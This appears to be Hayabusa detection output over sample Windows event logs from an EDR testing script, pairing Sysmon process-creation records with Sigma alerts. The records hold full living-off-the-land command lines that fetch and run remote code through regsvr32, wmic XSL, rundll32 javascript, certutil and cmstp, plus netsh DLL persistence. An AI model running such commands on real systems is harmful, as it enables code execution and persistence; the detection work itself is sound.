+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe  xxxFile.csproj  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic  process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: wmic  process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl      :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh trace show status      :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh.exe add helper AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh trace stop  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  trace show status      :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh trace show status    ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  trace start capture=yes filemode=append persistent=yes tracefile=trace.etl      :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl    ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  trace stop  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe  add helper AllTheThings.dll  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat  :  Path: C:\Windows\System32\dispdiag.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: netsh  trace start capture=yes filemode=append persistent=yes tracefile=trace.etl    ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c rundll32 AllTheThings.dll,EntryPoint  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32  AllTheThings.dll,EntryPoint  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32  AllTheThings.dll,EntryPoint  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32  AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1    :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe  -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1    :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe  /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf  :  Path: C:\Windows\System32\cmstp.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
